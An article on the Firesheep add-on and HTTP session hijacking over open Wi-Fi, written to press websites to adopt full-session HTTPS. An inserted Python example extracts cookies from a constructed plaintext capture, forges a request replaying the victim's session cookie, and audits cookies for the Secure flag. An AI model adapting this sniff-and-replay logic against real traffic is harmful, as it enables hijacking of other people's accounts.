HTTP session hijacking, and tools to carry it out, have been around for more than half a decade, but it took an easy-to-use Firefox add-on like Firesheep to point out "the elephant in the room": the lack of full-session encryption on popular sites such as Facebook, Twitter, Yahoo, Bing and many others, which encrypt the login but then send the session cookie over plain HTTP for the rest of the visit.
Sniffing unencrypted HTTP sessions on a shared network segment (an open Wi-Fi hotspot, for example), capturing their session cookies and replaying them to impersonate the user has suddenly become possible for everyone, even for those who know next to nothing about the underlying technology.
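The two halves of the attack described above, as an added example that is not part of the original article and not Firesheep's own code: a passive listener pulls every cookie out of plaintext HTTP requests it sees on the segment and builds its own request carrying the victim's cookies, and a simple audit shows the server-side property that would have stopped the leak (the Secure attribute on the session cookie). The capture, host names and cookie names are all constructed for the example; in a real tool the host comes from the TCP connection rather than being embedded in the list.

```python
"""Added example (not from the article or from Firesheep): passive cookie
capture from plaintext HTTP, replay of the stolen cookies, and a Set-Cookie
audit. All traffic below is constructed; no packets are sent."""
from typing import Dict, List, Tuple

# Constructed capture: (host the connection went to, raw HTTP message).
# Only plaintext messages appear here, because that is all a sniffer sees.
CAPTURE: List[Tuple[str, str]] = [
    ("social.example", "GET /login HTTP/1.1\r\nHost: social.example\r\n\r\n"),
    ("social.example",
     "HTTP/1.1 200 OK\r\n"
     "Set-Cookie: sessid=7f3a9c; Path=/; HttpOnly\r\n"
     "Set-Cookie: lang=en; Path=/\r\n\r\n"),
    ("social.example",
     "GET /home HTTP/1.1\r\nHost: social.example\r\n"
     "Cookie: sessid=7f3a9c; lang=en\r\n\r\n"),
    # A site whose session cookie is Secure-flagged: only the harmless
    # language cookie ever travels over plain HTTP.
    ("bank.example",
     "GET /index.html HTTP/1.1\r\nHost: bank.example\r\n"
     "Cookie: lang=en\r\n\r\n"),
]


def parse_message(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw HTTP message into its start line and (name, value)
    header pairs. Names are lower-cased; repeated headers such as
    Set-Cookie stay as separate entries."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def is_request(start_line: str) -> bool:
    """Requests start with a method; responses start with the version."""
    return not start_line.startswith("HTTP/")


def sniff_session_cookies(capture: List[Tuple[str, str]]) -> Dict[str, Dict[str, str]]:
    """What a passive listener learns: every cookie sent in a plaintext
    request, keyed by host. No password is needed for any of this."""
    stolen: Dict[str, Dict[str, str]] = {}
    for host, raw in capture:
        start, headers = parse_message(raw)
        if not is_request(start):
            continue
        for name, value in headers:
            if name != "cookie":
                continue
            for pair in value.split(";"):
                if "=" in pair:
                    k, v = pair.strip().split("=", 1)
                    stolen.setdefault(host, {})[k] = v
    return stolen


def forge_request(host: str, path: str, cookies: Dict[str, str]) -> str:
    """The hijack step: the attacker's own request carrying the victim's
    cookies. To the server it is indistinguishable from the victim."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header}\r\n\r\n")


def audit_set_cookie(set_cookie_values: List[str]) -> Dict[str, bool]:
    """Server-side check: True if the cookie carries the Secure attribute
    (the browser will only send it over TLS), False if it can leak on any
    plain HTTP request to the same site."""
    result: Dict[str, bool] = {}
    for value in set_cookie_values:
        parts = [p.strip() for p in value.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.lower() for p in parts[1:]}
        result[name] = "secure" in attrs
    return result


if __name__ == "__main__":
    stolen = sniff_session_cookies(CAPTURE)
    print("cookies seen in the clear:", stolen)
    print(forge_request("social.example", "/home", stolen["social.example"]))
    print(audit_set_cookie([
        "sessid=7f3a9c; Path=/; HttpOnly",
        "auth=d41d8c; Path=/; Secure; HttpOnly",
    ]))
```

The Secure attribute is the narrow fix: it keeps the session cookie off plain HTTP connections, so a listener sees at most the harmless cookies. It does nothing for a site that still serves its pages over HTTP, which is why the add-on's authors keep pointing at sites adopting full-session HTTPS as the real measure of success.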
Within four days of Firesheep being made available, over 400,000 users had downloaded it and satisfied their curiosity. Some of them have probably used it for more than that; who knows how many unethical and illegal things were done with the information that was accessed through its use? But that is beside the point, because things like that happened before Firesheep. The only difference was that one had to be moderately tech-savvy to do it.
“Websites have a responsibility to protect the people who depend on their services. They’ve been ignoring this responsibility for too long, and it’s time for everyone to demand a more secure web. My hope is that Firesheep will help the users win,” says Eric Butler, one of the developers of the add-on.
“The real story here is not the success of Firesheep but the fact that something like it is even possible,” says Ian Gallagher, Butler’s co-presenter of Firesheep at Toorcon. “The same can be said for the recent news that Google Street View vehicles were collecting web traffic. It should not be possible for Google or anybody to collect this data, whether intentional or not. Going forward the metric of Firesheep’s success will quickly change from amount of attention it gains, to the number of sites that adopt proper security. True success will be when Firesheep no longer works at all.”
Both of them might just see their wish fulfilled. According to a NetworkWorld blogger, Microsoft is looking into implementing SSL in a future release of Bing. And I’m betting that other companies and online services are looking into it.
As noted above, HTTP session hijacking is not new, and many tools that make it possible have surfaced over the years. “Firesheep is doing the exact same thing as these other tools, but with a simpler user interface,” says Gallagher. “Because of its simplicity, Firesheep has already succeeded in demonstrating the risks of insecure websites to a much wider audience than any previous tool, in a single day.”
And that, my friends, is the real value of this controversial extension.